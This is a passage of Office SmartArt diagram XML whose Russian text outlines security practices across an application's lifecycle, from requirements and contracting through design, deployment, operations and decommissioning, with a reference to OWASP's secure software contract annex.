    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{0D8776E4-C6E0-DD41-8284-A92422A38905}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{962AFFE9-B6FE-7E4C-82C5-DA2F105924FE}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{C2DC27EF-6BCD-7441-AED6-06191BA94EBD}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7F2BD18E-C576-0B40-8A79-2061FD91A6AD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F11C5EAC-E38F-C54D-9134-7BD35514090E}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DC5835FE-E6F7-2440-AF28-03961D703AD0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C879C756-7CC5-1C40-99E3-0B4D348381F5}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21C92099-A8C0-244E-98EE-3C96FB85D628}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{71D2F385-7E2E-3B45-AF74-0F8027D22859}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{56948B33-D647-FD4C-A028-B51AE83662FA}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0B1D2250-505B-A44D-8224-82EEBBA120ED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{025B9155-C0BA-7049-91B5-A1D32F1DEB0C}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1588341-F986-5342-9994-60239EC65C89}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{75076ACA-146B-9E4C-908A-32B2F24505EF}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE472279-B568-0541-AF39-066CEFB488D7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{742FA27F-6C85-1848-A1A5-23A30E3E151A}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B83C7B20-BD74-EF4B-9B40-B30B1AE57D02}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{45D3D10D-FD08-7746-B350-4A8B85A33536}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4DE2077D-1E41-7641-B88D-5BE8A93F9C50}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5826FA6-000D-004B-92CE-0D501786FEBD}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6570E917-5502-744F-90A6-96AEB6E7F264}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A8A8AF2C-ECA9-5B4B-A4FC-6EE47F3FAD86}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401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B7DFC-AE2C-443E-8CBC-87D79BE207FB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114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="ru-RU" sz="1050" b="1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Требования и управление ресурсами</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C1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Соберите и обсудите с заказчиком бизнес-требования к приложению, включая обеспечение конфиденциальности, подлинности, целостности и доступности всех информационных активов, а также ожидаемую бизнес-логику.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" type="parTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}" type="sibTrans" cxnId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="105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Запрос предложений и заключение контракта</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="90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Планирование и проектирование</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D20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планы и проекты с разработчиками и внутренними партнерами, например специалистами по безопасности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" type="parTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}" type="sibTrans" cxnId="{68D71606-5C52-434C-93A7-B1ED203D82B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="1050" b="1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Вывод из эксплуатации</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64E29A9E-D7A3-4691-83A1-965007B0BD76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должны включать в себя управление безопасностью приложения (например, управление обновлениями).</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" type="parTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}" type="sibTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6280EA87-E46C-40B8-91EF-12C1C27B37A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ru-RU" sz="9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Все важные данные необходимо заархивировать, а остальные безопасно удалить.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" type="parTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}" type="sibTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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Развертывание, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="105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тестирование и внедрение</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED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требования с внутренними и внешними разработчиками, включая нормативы и требования вашей программы обеспечения безопасности, например рекомендации по жизненному циклу разработки ПО.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" type="parTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}" type="sibTrans" cxnId="{630BF613-79F8-428F-8964-E241E474DFB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="ru-RU" sz="1050" b="1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и контроль изменений</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AEE799B-7F35-4AE2-93E2-335733E35922}" type="sibTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" type="parTrans" cxnId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C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Автоматизируйте безопасное развертывание приложения, интерфейсов и компонентов, а также получение необходимых разрешений.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" type="parTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}" type="sibTrans" cxnId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{719FD505-9C05-4301-8C8D-24A4329404E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Составьте перечень технических требований, включая  функциональные и нефункциональные требования по безопасности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" type="parTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{595F5683-5B41-4144-8717-8475FEB51759}" type="sibTrans" cxnId="{DE5646CC-F144-493B-9414-C6346E590FF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938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обсудите бюджет, охватывающий все аспекты проектирования, создания, тестирования и эксплуатации, а также работы по обеспечению безопасности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{918768C3-D12F-4161-B487-A57F29898241}" type="parTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}" type="sibTrans" cxnId="{34810BA8-ABE6-4135-9DA7-66092273C67F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F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выполнение всех технических требований, включая этап планирования и проектирования.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21595102-299C-4FC9-AD15-9036120CA438}" type="parTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}" type="sibTrans" cxnId="{953325A0-207E-4AE6-A6DC-14B69025B19F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38353036-4B60-4F8B-ACD2-5B049C807A9A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все технические требования, включая проектирование, безопасность и гарантийные обязательства.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" type="parTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}" type="sibTrans" cxnId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{495252AF-5996-4B38-A1EE-B648650A10A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Используйте шаблоны и контрольные списки, например </a:t>
          </a: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Приложение по безопасности к Контракту на разработку ПО от OWASP</a:t>
          </a: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. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" b="1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Примечание:</a:t>
          </a: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 приложение применимо к договорному праву США, проконсультируйтесь с юристом перед его использованием.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" type="parTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F126DBDA-495B-4894-915F-3153C0E98C12}" type="sibTrans" cxnId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{657D5226-6628-4A3D-87F9-833B7666A7A2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архитектуру и средства управления безопасностью, а также контрмеры, соответствующие требованиям защиты и ожидаемым уровням опасности. Все это должно обеспечиваться специалистами по безопасности.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" type="parTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}" type="sibTrans" cxnId="{6C048991-4CC6-48F3-85DE-06094639B4B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733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Убедитесь, что владелец приложения принимает остальные риски или предоставляет дополнительные ресурсы.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" type="parTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2D6A2A1-5438-4DC5-806B-70724658813A}" type="sibTrans" cxnId="{2B332EAB-1224-4EC7-902F-FB64603358D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE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 каждом спринте обеспечьте создание записей по безопасности с указанием ограничений, добавленных для нефункциональных требований.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" type="parTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03388AB2-B7BD-4A7D-8228-58066747E14F}" type="sibTrans" cxnId="{62404027-5448-4393-9E79-DA90FB84286A}">
